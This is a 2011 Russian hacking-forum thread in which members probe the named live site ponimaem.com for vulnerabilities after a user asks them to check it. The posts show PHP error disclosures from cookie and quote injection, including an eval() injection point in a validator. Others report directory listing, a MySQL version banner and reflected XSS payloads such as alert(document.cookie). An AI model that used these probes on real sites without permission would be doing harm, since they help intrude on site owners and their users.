Форум АНТИЧАТ - Проверка на уязвимости сайта

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Проверка на уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=110)

- - Проверка на уязвимости сайта (https://forum.antichat.xyz/showthread.php?t=254918)

zx_su

22.01.2011 15:11

Добрый день.

Прошу проверить сайт ponimaem.com на наличие дырок.

Буду очень благодарен.

Прошу прошения, если тему создал не там.

~d0s~

22.01.2011 17:23

Добавляем спец.символы в куки,видим:

Код:

Code:

Warning: session_start() [function.session-start]: The session id contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in /home/otvetp/public_html/ponimaem.com/includes/header.php on line 25



Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /home/otvetp/public_html/ponimaem.com/includes/header.php:25) in /home/otvetp/public_html/ponimaem.com/includes/header.php on line 25



Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /home/otvetp/public_html/ponimaem.com/includes/header.php:25) in /home/otvetp/public_html/ponimaem.com/includes/header.php on line 25

BigBear

24.01.2011 20:14

Также есть возможность погулять по папкам

Код:

Code:

http://ponimaem.com/includes/



http://ponimaem.com/images/

При попытке постучаться на 3306 порт выплюнуло версию мускула

5.0.91-community

CheatCodeX

25.01.2011 04:37

Подставляем ' в поле пароля видим

Код:

Code:

Warning: Unexpected character in input: ''' (ASCII=39) state=1 in /home/otvetp/public_html/ponimaem.com/includes/classes/validator.php(26) : eval()'d code on line 1

XAMEHA

25.01.2011 05:31

В гостевую требуется капча

Ruslan1817

25.01.2011 07:16

Код:

Code:

http://ponimaem.com/gb/index.php?pg=&t=">alert(document.cookie)

какой балбес Acunetix запускал ? )) Вы хоть руками тоже смотрите.

Gedj	25.01.2011 09:11

Parse error: syntax error, unexpected T_CONSTANT_ENCAPSED_STRING in /home/otvetp/public_html/ponimaem.com/includes/classes/validator.php(26) : eval()'d code on line 1

Нажимаем регистрация в поле вставляем '

kravch_v

07.12.2011 22:33

XSS

http://ponimaem.com/test.php

Форма:

Код:

Code:

alert('xss')

Время: 04:16